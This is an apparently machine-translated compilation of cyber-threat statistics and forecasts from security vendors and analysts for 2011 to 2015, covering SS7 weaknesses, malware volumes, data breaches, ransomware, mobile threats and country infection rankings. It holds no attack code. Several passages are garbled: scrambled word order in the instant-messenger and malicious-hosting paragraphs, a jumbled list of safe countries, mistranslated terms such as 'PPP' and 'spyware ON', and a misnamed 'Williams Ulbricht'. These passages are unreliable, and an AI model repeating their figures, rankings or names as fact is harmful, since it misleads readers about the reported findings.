Positive Technologies' work on testing the protection of mobile networks has shown that the vulnerabilities of cellular networks based on SS7 technology allow an attacker, even with low qualifications, to implement attacks such as revealing the location of a subscriber, disrupting the availability of a subscriber, intercepting SMS messages, faking USSD requests and transferring funds with their help, redirecting voice calls, eavesdropping conversations, disrupting the availability of a mobile switch. According to Positive Technologies, most telecom operators are not protected from such attacks. However, there has been a positive trend: now telecom operators are interested in monitoring the security of their networks. Next year, experts predict an increase on their part in demand for information security services.

84 million new malware samples, 9 million more than in 2014

PandaLabs, Panda Security's antivirus lab, discovered and defused over 84 million new malware samples throughout 2015, up nine million from 2014. This level means that approximately 230,000 new malware samples appeared every day during 2015.

The past year showed the largest number of cyber attacks recorded around the world, in which about 304 million threat samples were used. Consequently, more than a quarter of all samples of malware used were produced in 2015 (27.63%).

The past year has also been difficult for a number of multinational companies that have suffered from large-scale data theft and negative impacts on their IT systems.

The most powerful threats in 2015: Trojans and PPP

In 2015, Trojans, PPPs (potentially unwanted programs, PUPs) and individual Cryptolocker families sowed fear among large companies around the world through massive attacks and theft of thousands of sensitive files.

Trojans continue to be the main source of malware (51.45%), comfortably ahead of other types: viruses (22.79%), worms (13.22%), PNP (10.71%) and spyware ON (1.83%).

In addition to Trojans, Cryptolocker (referred to as ransomware) was the protagonist of cyber attacks throughout the year. According to Corrons, "Cryptolocker is the best choice for cyber criminals, because it is one of the easiest ways to make money. In addition, it proved to be very effective, especially in the case of enterprises that do not think for a long time when paying a ransom for regaining control over stolen information. "

The largest infections are caused by Trojans

Among all the types of malware that led to large infections worldwide, the Trojans showed the highest infection rate (60.30%), but their figure decreased by 5% compared to 2014.

PPPs also had a rather negative impact: about a third of infections used deception techniques to penetrate the PC of their victims. Far behind in this "rating" are such types of threats as adware and spyware ON (5.19%), worms (2.98%) and viruses (2.55%).

China remains one of the most infected countries in the world

Last year was notable for showing the highest infection rates on computers. Geographically, China turned out to be the country with the highest level of infected computers (57.24%), and this figure was about 30% higher than in 2014. Next is Taiwan with an infection rate of 49.15%, and Turkey is in third place (42.52%). These three countries still remain at the top of this infection rating, as was the case in 2014 and 2013.

The ten most infected countries in the world did not include the following countries that showed infection rates above the global average: Colombia (33.17%), Uruguay (32.98%) and Spain (32.15%).

Scandinavian countries showed the lowest infection rate

In the ten less infected countries of the world, nine countries represent Europe, and only Japan turned out to be the only country from another continent.

Scandinavian countries took all three top positions: Finland showed the lowest infection rate of 20.32%, followed by Norway (20.51%) and Sweden (20.88).

2014

Better to pay than to protect?

Half of financial institutions in Russia reimburse their clients for losses incurred as a result of Internet fraud, without conducting an investigation. 31% of companies are willing to consider compensation after an internal investigation of the incident, and 8% require an external investigation. Such data were obtained during a special study on the attitude of commercial companies to cyber threats conducted by Kaspersky Lab in conjunction with the independent agency B2B International in 2014.

As experts found out, many organizations working with online payments are ready to allow inevitable monetary risks just not to invest in specialized IT protection. Thus, a quarter of companies are still confident that the costs provoked by cyber threats are less than the costs of security solutions. Surprisingly, among financial institutions most directly related to online transactions with money, the share of those holding the same position is even higher - 33%.

According to data obtained using the cloud infrastructure of Kaspersky Security Network, in 2013, almost 4 million users of Kaspersky Lab products faced an attempt to steal their money using special malicious programs (compared to 2012, the figure increased by 18.6%). This fact indicates the increasing interest of cybercriminals in electronic payments, and such a trend will inevitably lead to the fact that the costs that companies will incur in connection with compensation payments will be significantly more than investments in defense against such cyber threats.

"In addition to putting separate funds in the budget to recover stolen goods, financial companies also incur the cost of handling customer complaints. But most importantly, even if the victim is promptly returned the money, he will think about whether it is worth using the services of a bank that cannot ensure the security of his online account? It is better to prevent losses, not compensate, "comments Alexander Ivanyuk, Senior Manager for Development of Kaspersky Lab Business Solutions for Financial Companies

.

Gemalto: Overview of data breaches and thefts

Gemalto published in February 2015 the results of the SafeNet Breach Level Index (BLI), according to which more than 1,500 data leaks that occurred in 2014 led to the fact that about one billion data records were compromised worldwide. The data means data breaches are up 49% and the number of data stolen or missing is up 78% on 2013.

Continuing this comparative analysis, which was developed at SafeNet, acquired by Gemalto, the Data Breach Criticality Index (BLI) is a global database of ongoing data breaches that provides security professionals with a methodology to assess the severity of a leak and determine its place among leaks disclosed publicly. The BLI estimates the severity of the data leak by various parameters based on the information disclosed about the leak.

According to data in the BLI database, the main motivation for cybercriminals in 2014 was identity theft; this type of data theft accounted for 54% of all leaks and exceeded all other categories, including access to financial information. In addition, data breaches related to theft of personal information accounted for one-third of the most serious leaks, which were characterized by the BLI as either catastrophic (9.0-10 points on the BLI scale) or serious (7.0-8.9 points). Security breaches, including security perimeter breaches where compromised data was encrypted in whole or in part, increased from 1% to 4%.

In 2014, there was not only a shift towards increased identity theft; leaks also became more severe, with two-thirds of the 50 most severe leaks according to the BLI score occurring in 2014. In addition, the number of data leaks, including more than 100 million compromised data records, doubled compared to 2013.

From the point of view of sectors of the economy, in 2014 retail and financial services underwent the most noticeable changes compared to other sectors. In retail, data breaches slightly increased from a year ago, accounting for 11% of all 2014 data breaches. However, when it comes to compromised data records, their retail share rose to 55%, up from 29% last year, due to an increase in attacks targeting point-of-sale systems. For the financial services sector, data breaches remain relatively stable year on year, but the average number of records lost in each breach has increased tenfold, from 112,000 to 1.1 million.

According to BLI, in general, in 2014, when carrying out attacks, personal data remained the main target of cybercriminals. Such incidents accounted for 54%. Most often, information is stolen from retail enterprises. Hackers, breaking into the IT systems of the retail network, receive such personal data as:

• payment card data,
• information indicated when issuing a discount or club card,
• data on the place of residence,
• mobile phone number, etc.

Annual information security reviews claim that the most common data leaks are thanks to company employees. This happens either by malice or negligence. Third-party competitor companies steal information as often as hackers.

Most information leaks in 2014 were recorded in the United States. This is due to the particular scrupulousness with which Americans treat their personal data. For example, in one of the healthcare institutions in the United States in March 2014, an insider was found who copied personal data of patients. Only four patients could become victims of information theft, but in the end, several thousand patients who applied to a medical institution for several years, while an insider worked there, suffered.

The Data Leak Criticality Index (BLI) includes a centralized global database of leaks and provides an assessment of the level of a particular data leak by various parameters, including the type of data and the number of stolen records, the source of the leak, as well as whether the leaked data was encrypted. Each leak receives a certain score, thus the BLI index is a comparative table of leaks, allowing you to distinguish small and minor incidents from really large and significant leaks. The information included in the BLI database is based on publicly available information about leaks.

Global Cyber Executive Briefing "Deloitte Touche Tomatsu Limited"

The report of Global Cyber ​ ​ Executive Briefing "Deloitte Touche Tomatsu Limited" states that almost all organizations will be exposed to cyber attacks, so top managers need to delve as deeply as possible into the essence of key threats, as well as identify the most vulnerable assets (as a rule, these are those that underlie business).

"If earlier, to gain benefits, attackers needed physical presence and direct contact with the object to which illegal actions were directed, now everything has become much easier. Nowadays, when technologies are developing faster and faster every year, information has acquired extremely high value, ― says Sergey Bukhanov, director of the Risk Management Department of organizations at Deloitte, CIS. ― The vast majority of the most "profitable" crimes for attackers today are committed remotely, as eloquently evidenced by the news feeds of recent months: theft of funds from the accounts of hundreds of customers of the popular network of payment terminals; theft of personal data on payment cards of hundreds of thousands of citizens who purchased tickets through the website of one of the largest transport companies in the world, which forced some banks to block or restrict the functionality of plastic cards of several thousand of their customers. In addition, we often learn about the exposure of bank employees who have used excessive privileges to illegally transfer customer funds to personal accounts or issue a bank guarantee through unauthorized use of the SWIFT system. Given all this, more and more executives of various companies around the world are coming to understand the materiality of emerging threats and pay increased attention to information security issues when using information technology. It is also important to note that over the past few years, the legislation of the Russian Federation has been improved in areas related to ensuring the safety of the use of information technologies and the protection of personal data. Thus, new standards of the Central Bank of the Russian Federation for ensuring the information security of banking systems have been published; issues of strengthening responsibility for crimes in the banking sector committed in order to steal funds using high technologies are being discussed. "

According to the report's findings, reliability assurance begins by identifying application weaknesses and strengthening the digital infrastructure. Accordingly, organizations that want to be vigilant should be prepared to detect any attack as early as possible. Rapid mobilization involves early determination of the threat's direction of action, the cause of the attack, and how it will manifest itself. Quick detection of an attack can be a signal for the organization to act and thus help localize and eliminate the threat.

Key findings of the report, including threats to companies by industry:

• High technology: Such companies are constantly the target of attacks that pose the threats of the largest losses of intellectual property, as well as the most susceptible to hacktivism. Threats are also used as a means of attacking and infecting other companies.
• Online media: Such companies are most susceptible to cyber attacks to damage their reputation. Threats are used as a means of attacking and infecting other companies.
• Telecommunications: Data companies are facing an increased level of technically sophisticated attacks, including from government agencies using targeted, persistent threats to establish covert surveillance for an extended period. Another significant threat inherent only in the telecommunications sector is the attack on leased technical equipment such as home ISP routers.
• E-commerce: in this case, there is a predominantly database hack (i.e. loss of customer data, including their names, actual addresses, and phone numbers). Vulnerable areas such as online payment systems are often attacked. The most common type of attack is a Denial of Service response call. In particular, it is used by hacktivists who want to disrupt the organization in the most visible way.
• Insurance: Companies in this sector tend to operate with large amounts of sensitive data that need to be protected. The frequency of cyber attacks in this sector is growing exponentially as insurance companies move to digital service channels. Attacks are becoming more sophisticated technically, combining advanced malware and other technologies such as psychological attack. While current attacks appear to be short-term, the report predicts a possible increase in long-term attacks that are not yet attracting much attention.
• Manufacturing: The sector has seen an increase in attacks by hackers and cybercriminals, as well as corporate espionage. Types of cyber attacks on manufacturing companies range from phishing to the use of advanced malicious software and target not only IT systems, but also related industrial control systems.
• Retail: In this sector, credit card data is effectively a new currency for hackers and criminals. In the retail sector, threats of insider information leakage are increasing, which contributes to the formation of a new type of criminals. Their goal is to steal information, especially valuable data about cardholders, which consumers and retailers exchange.

2013

Zurich: 2013 was the most successful year for cyber criminals

740 million confidential files were stolen or illegally viewed by cyber criminals in 2013. 2013 was the worst in this indicator of all time. Such data are provided by a study prepared by the insurance company Zurich Insurance Group in conjunction with the analytical agency Atlantic Council.

The study says that about 2.5 billion people - almost a third of the total population of the world - regularly use the Internet, and on average for each person there are 6 gadgets connected to the world network. 204 million emails are sent every minute, 640 terabytes of data are transmitted and 100,000 tweets are posted.

With this amount of data circulation, sensitive information is in a very vulnerable position, which can cause serious economic shocks. At the moment, there are no sufficient technologies in the world that can protect individuals and organizations from all cyber risks. If the company is not able to mitigate these complex and interconnected risks, then the likelihood of a sudden shock, comparable in scale to the collapse of Lehman Brothers in the mortgage market in 2008, increases.

The study identifies four sources of cyber risk - criminals, hackers, spies and the military.

Criminals usually use stolen information to sell it. More often than others, organizations working with the personal data of their clients suffer from them. Hackers act on a larger scale - they disrupt the networks of companies or steal information that can compromise an organization or person.

The third traditional cyber threat is espionage, aimed at company research, the latest developments, negotiation strategies and business plans. A prime example is the story of last year, when Chinese hackers stole blueprints for Australia's new intelligence agency building. The fourth group is the military. They specialize in the collapse of entire networks and systems, including infrastructure and industrial ones. This, however, happens quite rarely.

The list of these risks may be supplemented tomorrow with new ones - an invasion of cloud technologies, a system of cars "without drivers," medical devices and smart power systems (smart grid). Ever closer to the communication Internet real economy and society can lead to widespread upheaval, even more severe than risk managers and Internet professionals are willing to admit. banks Water supply systems, cars, medical devices, hydroelectric dams can be attacked.

The way out in this situation may be the creation of alternative networks in case of cyber attacks, as well as the increased attention of the top management of companies to protect information. To date, the vast majority of companies do not record the facts of cyber attacks, and often do not even know that their confidential data has already become the property of cyber criminals.

With the current dynamics of cyber threats, cyber risk insurance in the very near future may move from the exotic category to the category of standard insurance options, and the field of activity of risk engineers will be replenished with monitoring of effective electronic information systems.

• Threats to finance. In 2013, new malware for hacking online banking systems gained significant worldwide distribution; ransomware attacks have become more and more frequent (suffice it to recall the infamous Cryptolocker program, which encrypts user data and then offers to pay for decryption) (according to the 2013 Trend Micro Incorporated report on the cyber threat landscape "Caching in on Digital Information")
• Mobile threats. Threats to mobile platforms have evolved significantly in terms of number and level of complexity. This is due to the fact that more and more hacker programs originally created for PCs have been "reoriented" to mobile platforms. By the end of 2013, the total number of detected malicious and dangerous applications for Android reached 1.4 million. Users of Apple products also cannot consider themselves 100% protected from these dangers. Cybercriminals seek to "master" this wide, and therefore attractive audience of potential victims. It is not surprising that in 2013 the number of phishing attacks on users of Apple platforms increased.
• Protection of personal information. User accounts on social media and cloud data storage are becoming an increasingly attractive target for hackers. Aggressive phishing attacks timed to coincide with the release of various iconic platforms, such as the PS4 and Xbox One, have compromised the security of the data of millions of users.
• Attacks on infrastructure. Resonant cyber attacks in South Korea have shown that today hackers are "on the shoulder" to organize large-scale actions against critical elements of infrastructure.
• Unsupported software. One of the key issues of 2013 was concerns about the termination of support for some versions of Java and Windows XP. For the latest release of updates and fixes will be discontinued in April 2014.

Cyber ​ ​ attacks on IT corporations and the media

2013 was remembered for a number of significant events, one of which was a series of cyber attacks on leading media and IT corporations located mainly in the United States - at different times the New York Times, Wall Street Journal, Washington Post, as well as Twitter, Facebook, Evernote, Apple and Microsoft were attacked. These attacks to one degree or another led to the leakage of personal data of employees of companies and users of services.

Thus, the result of a cyber attack on Adobe Systems was the compromise of tens of millions of accounts of the company's customers, as well as the leak of source codes for such common products as Adobe Acrobat, ColdFusion and Photoshop.

Social media under attack

However, the activity of hackers was aimed not only at IT companies, but also at ordinary users. So, in February, ESET experts discovered a malicious PokerAgent code that infected players on the Zynga Poker Facebook app. The purpose of the hackers was the personal data of users, as well as information about bank cards linked to their accounts. To obtain the required data, a botnet was created from several hundred infected devices that executed command center instructions. As a result, PokerAgent stole the data of more than 16,000 Facebook accounts.

Another notable malware that threatens social media regulars was directed exclusively at Russian users - the Trojan was Win32/Bicololo.A distributed through phishing messages under the guise of links to harmless graphic files. When activating such a link, malware was downloaded instead of the image.

Once on the computer, Bicololo modified the system files so that when the user tries to go to the Vkontakte, Odnoklassniki website or check the mail on the Mail.ru, he would enter his data on a fake page belonging to the attackers.

Phishing attacks on Internet messengers

In 2013, not only users of social networks were under attack, but also fans of communication via the Internet. messengers Thus, the large-scale spam campaign discovered by ESET experts in, Skype, and Gtalk QIP a number of other instant messengers endangered more than half a million users worldwide (including 40,000 of them). Russia Using phishing messages, criminals infected the system with malware, ON gaining access to the victims' personal and authentication data.

Another major attack was the spread of spyware among Polish users. Analysts of the ESET virus laboratory in Krakow recorded an attack on users of Skype, MSN Messenger, Jabber, GTalk, ICQ and other messengers. Spy.Agent collected information about visited sites, installed applications, Wi-Fi passwords, as well as recorded messages entered from the keyboard and even listened to calls.

Capture of cybercriminals

But the actions of cybercriminals did not remain unanswered - for example, thanks to the activity of Microsoft, the Citadel botnet was liquidated in 2013. With the support of law enforcement agencies, providers and special services, the corporation conducted an operation to disrupt one of the world's largest botnets. The damage from his activity at that time exceeded half a billion dollars.

In addition, Williams Ulbricht, the founder of the site for the sale of illegal drugs Silk Road, was also unlucky - he was arrested in the United States. On the other side of the world, in Russia, Ulbricht's "colleague" was also detained - a hacker known as Paunch. He became famous as the owner of the famous Blackhole set of exploit hackers, which was actively used by cybercriminals around the world to secretly penetrate user systems.

Threats to TOR

Cybercriminals picked up the trend for anonymity back in the middle of the year - it was then that ESET experts discovered the Atrax botnet, technically the most complex and interesting botnet for the anonymous TOR network. Since data transfer in this network is not a fast process, the botnet was not used to steal large amounts of data. Instead, it collected information entered into authorization forms on various portals, and also downloaded additional malicious files to the PC. Atrax arrives on a PC through a special malicious page disguised as the PayPal customer service website.

Finding and destroying the command center of this botnet is not an easy task, since in this case, TOR anonymity does not protect users, but cybercriminals themselves. It can be assumed that with the growth of migration to the "hidden Internet" we will see new, technologically even more advanced threats to TOR.

Mobile threats

Another, while a relatively exotic variety of botnets, are botnets for mobile devices. First recorded in 2012, today most of the malware for Android contains functionality to combine infected smartphones and tablets into botnets.

If we talk about mobile threats in general, then, compared to the same period last year, the number of new families of malware for Android (which still account for up to 99% of all mobile threats) in 2013 increased by 43.6%, and this is not only about an increase in the activity of known threats, but about the emergence of new categories of software.

• Bootloader - Tries to download other malware files from the Internet and install them on your device.
• Dropper: installs other threats on the device at launch; threats are in the body of the dropper itself.
• Clicker: designed to generate traffic to sites through an artificial increase in the number of clicks.
• Banking malware: Specialises in stealing sensitive user information that is used to conduct online banking-related transactions.

One of the most active mobile threats was the SMS Trojan detected by ESET products as TrojanSMS.Agent (its modifications demonstrate especially high activity in Russia and the countries of the former USSR). In 2011, 31 modifications of this program were discovered, and in 2013 they were already recorded 324. Such Trojans can secretly send messages from the user to paid numbers, emptying the mobile account.

In 2013, the total number of malware for the Android platform increased by 63%. Iran, China and Russia demonstrated the highest growth rates of Android threats.

Similar growth rates will continue in 2014; new mobile threats will demonstrate not only quantitative, but also qualitative growth - in particular, they will increasingly exploit the vulnerabilities of mobile platforms and their components.

Programs extortioners

Ransomware activity in 2013 also showed significant growth - for example, ESET experts detected in Russia a rapid increase in the activity of the FileCoder ransomware Trojan, which requires a ransom for decrypting the user's personal files. Compared to the average level recorded in the first half of 2013, FileCoder activity increased by more than 200%. According to ESET, Russian users accounted for more than 44% of the detections of this program.

Another ransomware common in the 2013, CryptoLocker, used a countdown as a psychological attack - an infected user was given only 70 hours to pay a ransom and gain access to encrypted personal data. Otherwise, he said goodbye to them forever.

The Nymaim Trojan discovered by ESET experts can also block a user's computer for ransom. Previously, this software was infected with the already mentioned BlackHole exploit kit, but later cybercriminals reoriented to distribution through Google search. By clicking on a malicious link in the search results, the user, instead of the information he was looking for, initiated the download of a malicious archive,

In 2014, you should also not expect a decrease in ransomware activity - in particular, the emergence of new modifications will spur the popularity of the Bitcoin virtual currency. Thanks to its anonymity and a high rate, cybercriminals will increasingly demand a ransom in bitcoins. However, some cybercriminals decided not to extort bitcoins from users, but to steal them directly - for example, a new modification of the famous banking Trojan Hesperbot, widespread in Europe, is now aimed at stealing electronic currency. Theft is realized by gaining access to an electronic wallet containing secret keys.

2012

WatchGuard: Cloud service providers to be hit by massive network attacks

2012 for the field of information security will be difficult and at the same time interesting in terms of technology development. Introducing the new WatchGuard forecast for 2012 in terms of threats in the field of network and information security^[48].

In 2012, a large-scale wave of organized network attacks on cloud services and hacking of large cloud providers are expected. At the same time, the protection of the network assets of cloud service providers will reach a new level of development.

Why are clouds extremely interesting targets for hacking?

• Many customers store their sensitive data in the clouds, where it can easily be accessed by intruders.
• The development of cloud services uses complex information technologies that can have serious vulnerabilities.
• Most cloud service providers use sophisticated, bespoke Web applications and virtualization technologies, which, if configured incorrectly, can pose a significant threat to data security in the clouds.

Attackers will use new technologies and malicious APT software to organize attacks on corporate networks

In 2012, Advanced Persistent Threats (APT), a complex and detection-resistant malware, will actively develop.

In 2011, governments of many countries, production process management systems and large global companies suffered from APT threats. Using this software, RSA SecureID, 'Operation ShadyRat' were hacked. In addition, there is a successor to the Stuxnet network worm - the Duqu worm.

It is expected that this year APT malware will be improved and APT threats will be aimed not only at the corporate sector, but also at ordinary users.

Major sensitive data leaks expected

Due to the emergence of complex APT malware, new malware authors and professional hacker groups such as Anonymous and LulzSec, in 2011 there were significantly more incidents related to large network attacks than in previous years.

It is difficult to say for sure what had a greater impact on such a significant increase in the number of network attacks. Perhaps the attackers have become more organized, many professional groups of hackers have appeared, or new regulations have been introduced that require companies to report all attacks and data breaches that have occurred. In any case, it is expected that the trend towards an increase in the number of leaks will continue in 2012.

Increased demand for virtual security solutions

In 2012, interest in virtualization systems security solutions will increase significantly among small and medium-sized companies.

Until recently, many IT professionals working in small and medium-sized businesses did not fully realize how serious the risk of data loss could be if they did not pay enough attention to the proper implementation of virtual environments.

Now the situation will change: in the new year, the demand will grow not only for virtualization technologies, but also for information security tools for virtual environments.

Online mobile app stores for smartphones and communicators' will help'the rapid spread of mobile malware

Attackers will continue to focus on mobile devices, or rather online stores of mobile software. To avoid the threat of infection with mobile malware, you need to be careful when downloading mobile applications from online stores, as well as be sure to take into account the reputation of the seller and developer of the application.

BYOD issue will lead to more data breaches

Employees' use of personal mobile devices in company work networks (Bring Your Own Device, BYOD) can lead to serious data breaches.

Specialists advocating for allowing employees to use their mobile devices on the corporate network say BYOD will help companies substantially reduce costs associated with the IT sector, increase productivity, reduce the burden on technical support services and simply make staff work more convenient and comfortable.

But besides the obvious benefits that BYOD brings, it should be borne in mind that there is a risk of leakage of important information and problems associated with centralized control of these devices.

Facebook network will remain the main target for attackers (network attacks, hacking using social engineering methods, malicious software)

In 2011, Facebook became the largest source of malicious links, overtaking in popularity such a threat as malicious email attachments.

In 2012, the number of network attacks on both individual Facebook users and the network as a whole will increase significantly. In this regard, it is expected that this year a large number of Facebook security updates will appear and new effective solutions will be implemented that provide network protection.

Attackers will begin to organize attacks aimed at the physical equipment of network infrastructures

There will be at least one major network attack this year aimed at disrupting the physical hardware of the network infrastructure.

Theoretically, the possibility of such attacks, for example, on power supply systems, has been known for a long time, but no one heard about their implementation until a hack using the Stuxnet network worm occurred. This worm can infect SCADA equipment and make changes to the system that directly affect the operation of physical equipment.

At the moment, SCADA systems represent the main purpose of research for both attackers and security specialists, since modern malware has the widest functionality and can effectively infect production process control systems.

Attackers will integrate user location functions into malware to more accurately control attacks

Geolocation is one of the main topics of discussion among security specialists, since such software functionality potentially violates a person's right to privacy. Such information can be used to track people and their habits.

In 2012, there will be a lot of malware with geolocation capabilities, thanks to which attacks will become more targeted. Simple geolocation capabilities in malware are already being used, allowing attackers to choose targets based on the location of users and thus choosing the most effective attack methods for different regions of the world. It is expected that this year attackers will actively use geolocation capabilities to increase the malicious impact of network attacks.

HTML5 will give attackers many opportunities to hack websites

For years, the Internet has been a battleground between hackers and users. In 2011, most network attacks targeted Web applications, as a result of which attackers were able to steal terabytes of data.

The use of dynamic Web technologies such as Web 2.0 and HTML 5 is one of the main factors in the increase in the number of attacks on Web applications. Dynamic Web technologies are extremely powerful and undoubtedly very useful, but they also have a number of disadvantages associated with a security vulnerability. They are used by almost all major Web sites, as well as the largest cloud providers. However, if it is wrong to use Web technologies and secure coding techniques when developing Web applications, attackers will have many opportunities to hack and bypass the protection of corporate networks. In 2012, the number of network attacks on Web applications will increase tenfold.

Symantec: Cyber conflict will become the norm

The corporation Symantec published in December 2012 a forecast of trends in the world for cyber security 2013. According to the corporation's experts, in 2013 attacks will become more aggressive and will be carried out not only for the purpose of earning money or espionage, but also for the purpose of demonstrating the strength of the attackers. In addition, the number of threats to users of mobile and cloud technologies, as well as to the audience of social networks, will increase.

Cyber ​ ​ conflict will become the norm

Starting in 2013, conflicts between states, organizations and individuals will largely turn into cyberspace. Online espionage is highly successful with an extremely low degree of provability. Governments, like various organized groups of individuals, will continue to use cyberattacks to damage or destroy sensitive information or the financial resources of their adversaries. In 2013, we will witness a virtual "gun shake-up," where governments, organisations or even groups of individuals use cyber-attacks to show off their power or make themselves known.

Symantec experts also expect an increase in the number of targeted attacks aimed at an individual or non-governmental organization that advocates, for example, certain political views or is a member of a minority in a particular conflict. Recently, we have encountered this kind of attack in situations where the behavior of individuals or organizations becomes the subject of discontent of a particular group of "hacktivists."

Ransomware Is Replacing False Antivirus

While the prevalence of false antibodies is slowly fading away, even tougher types of threats are emerging in the expanses of cyberspace. All over the world, the so-called ransomware (from the English ransom - ransom), ransomware, quite popular in Russia, are gaining popularity.

Despite the fact that such a "business model" had already been used before, it suffered from the same shortcomings as the real abduction: there was no convenient way to take money. But thanks to the development of online payment systems, attackers have solved this problem.

Blockers will go beyond simple extortion and will be aimed at intimidation, that is, cyber-bullying (cyber-attack with the aim of causing psychological harm). Next year, criminals will reach a new level, affecting the emotions of victims, using ways after which it will become much more difficult to restore the system.

Mobile advertising will complicate the situation

Mobile advertising software (madware, mobile advertising software) is a trifle that can not only greatly interfere with the process of using the device, but also give attackers details of your location, contact information, as well as device identification information. A madware program that invisibly hits the device when installing a third-party application often begins to flood the user with pop-ups, creates shortcuts, changes browser settings and collects his personal data. In the last nine months alone, the number of applications that include the most aggressive types of madware has increased by 210%. Data on the location and characteristics of the device can be legally acquired by Internet ad aggregators to provide more relevant ads. Symantec experts expect to see an increase in the use of this type of program due to the desire of companies to increase revenues through mobile advertising. This also includes a more aggressive and potentially malicious method of monetizing "free" mobile applications.

Monetization of social networks will create new dangers

Information security experts note that users have great confidence in social networks, from the exchange of personal data to the purchase of gaming currency and virtual gifts to friends. As social networks enable users to give real gifts to each other in order to increase the level of monetization, the growth of money turnover on social networks gives attackers new opportunities to carry out attacks.

Symantec information security experts expect an increase in the number of attacks aimed at stealing payment data on social networks and deceiving users in order to force them to report this and other data to fake social networks. This could include fake gift notices and emails requiring the user to provide their home address and other personal information. Although the provision of non-financial information may seem harmless, attackers trade and exchange it, combining data with existing ones, which often allows them to access truly valuable information.

Attackers will follow users to mobile and cloud technologies

Attackers will go where users are, and at the moment these are cloud and mobile technologies. It is cloud and mobile platforms that will become the target of attackers in 2013. The rapid increase in the number of malware for Android OS in 2012 reinforces this forecast.

In addition, the inclusion of unsecured devices in corporate networks that collect information that then settles on other cloud media significantly increases the risk of leakage or targeted data capture. The installation of more and more applications by users, ultimately, inevitably leads to infection.

Some malicious mobile programs duplicate the functionality of pre-existing threats, such as those that steal information from devices. However, sometimes something new also appears. For example, in the days of dial-up modems, there were programs that called 900 numbers belonging to hackers. Today, malware sends paid SMS messages, and the proceeds go to cybercriminals. In 2013, it will be possible to observe the further development of mobile technologies, which will create new opportunities for cyber intruders.

The increasingly popular eWallet technology will inevitably become another platform that attackers will try to use for their own purposes. And with the widespread adoption of mobile payment technologies, mobile devices will be even more valuable. By analogy with the Firesheep threat to intercept other people's Wi-Fi sessions, we should expect the appearance of programs that will intercept user payment information. Some payment systems are widely popular among technically inexperienced users and may have vulnerabilities that potentially lead to information theft.

2011

More data breaches, loss of devices, and how to take care of the future

The personal data of approximately 1.1 million people is the average result of each successful attack in 2011. There is a sharp increase in comparison with previous years. Such incidents turned out to be a serious threat, in 2011 data on 187 million people were stolen. However, the most common cause of data leaks is the theft or loss of a laptop or other storage medium, such as a smartphone, flash drive or backup media. As a result of such leaks, the data of about 18.5 million people were disclosed.

As tablet and smartphone sales continue to overtake PC sales, they will carry more and more confidential information every year. Employees bring their own smartphones and tablets and connect them to corporate systems even before the organization has time to implement protection and management of these devices. This can lead to an increase in the number of data leaks, since in the absence of proper protection, the loss of mobile devices poses a risk to the information stored on them. A recent study by Symantec shows that 50% of lost phones will not be returned to owners and in 96% of cases (including returned ones) data will be leaked.

Mobile threats hit businesses and individual users

In 2011, the number of mobile vulnerabilities increased by 93%. At the same time, there has been an increase in threats to the Android system. With the growing number of vulnerabilities for mobile devices, attackers not only adapt existing malware for mobile devices, but also create specialized malware that uses all the capabilities of the mobile platform. In 2011, mobile viruses for the first time presented a real threat to business and individual users. These threats are designed to collect data, share content, and track users.

Kaspersky Security Bulletin: Ranking of countries in terms of Internet surfing security

Kaspersky Lab experts previously prepared a traditional annual report on cyber threats - Kaspersky Security Bulletin 2011. Among the most revealing figures is the degree of risk of infection that computers are exposed to when surfing the web in different countries of the world, the report said.

Analysts compiled a rating of the most dangerous states for Internet surfing, the leader of which in 2011 was Russia: more than 55% of unique Internet users in the country were subjected to web attacks.

Ranking of the most dangerous countries for Internet surfing 

Source: Kaspersky Lab, 2012

Yuri Namestnikov, the author of the statistical report, noted that the statistics of the collision with cyber threats during web surfing "show the level of aggressiveness of the environment in which the computer works." In 2011, this figure grew by 2% worldwide and amounted to 32.3%.

Experts noted that in 2011 there were significant changes in the top three. From the third to the first place rose Russia (+ 2.2%). The second place remained for Oman with an indicator of 54.8%. In third place from the fifth position rose USA from 50.1%. Over the year, the risk level for web surfing in Iraq decreased significantly - from 61.8% to 45.4%. This country dropped from the first line of the rating to the eighth.

After third place in the "top ten" countries most dangerous for Internet surfing were distributed as follows: Armenia, Belarus, Azerbaijan, Kazakhstan, Iraq, Ukraine, Guinea-Bissau.

All countries included in the rating, Kaspersky Lab ranks by the degree of risk of infection when surfing the Internet. The "High Risk Group" with a result of 41-60% includes 22 countries led by Russia. 118 countries fell into the "Risk Group" with indicators of 21-40%, including Italy (38.9%), UAE (38.2%), France (37%).

The "Safest Internet Surfing Group of Countries" (0-20%) includes 9 countries: Ethiopia (20.5%), Haiti (20.2%), Denmark (19.9%), Niger (19.9%), Togo (19.6%), Burundi (18.6%), Zimbabwe (18.6%), Benin (18.0%), Myanmar (17.8%), Germany Japan Luxembourg, Austria and, Norway whose figures in 2010 ranged from 19% to 20% at risk.

With the exception of Denmark, the group of safe countries consists almost entirely of newcomers to the ranking - developing countries in Africa and Asia. Their entry into this group was explained by the nature of the distribution of files in these countries: the Internet is not yet very well developed there, and various removable media are actively used to exchange files.

Top 20 countries by the number of malware posted on resources

According to Kaspersky Lab"," in 2011, attackers used 4,073,646 domains to carry out 946 393 693 attacks over the Internet. The Servers malicious code was located in 198 countries. 86.4% of all malicious hosting recorded on the Web were posted on the Internet space of twenty countries. Of these, 14.6 Russia % of all attacks accounted for: this is the second place after. USA The Netherlands,,,, and Germany Ukraine China Great Britain others follow in the number of outgoing attacks.

Source: Kaspersky Lab, 2012

The researchers noted that despite the fact that the first two positions were then occupied by the same countries as a year ago, the active growth in the share of malicious hosting, which was recorded in these countries in previous years, stopped. This was facilitated by the active actions of law enforcement agencies to close botnets. However, despite the fact that the percentage of malicious hosting in these countries has decreased slightly, it still remains at a very high level, experts said.

Ranking Countries on Cyber Threat Preparedness

Sweden, Finland and Israel are named the most prepared countries in the world for cyber attacks. This was stated in a study by McAfee Security & Defense Agenda (SDA).

The report gives a rating of 23 countries in terms of their readiness to repel cyber threats, the maximum rating - 5 stars - did not go to anyone this year. In second place after the leaders were eight countries, including the United States, Great Britain, France and Germany, they received 4 stars.

A rating of 3.5 stars went to Australia, Canada, Japan and Austria, 3 stars were received by Italy, China, Poland and Russia. 2.5 stars each - Brazil, India and Romania. Mexico was the last - only 2 stars.

Top 23 world countries in terms of cyber security

Source: McAfee, January 2012 

According to Phyllis Schneck, Chief Technology Officer of McAfee, "evil is much faster than good," and that is why neither country was able to get the highest assessment.

As for Russia, it is very difficult for most experts to abstract from the reputation of "a country that is engaged in cyber espionage." In October 2011, officials of the counter-terrorist committee of the United States, speaking before Congress, stated that Russia poses a "permanent threat to US economic security." According to one of the experts, "Russia is a country of thugs with great hackers."

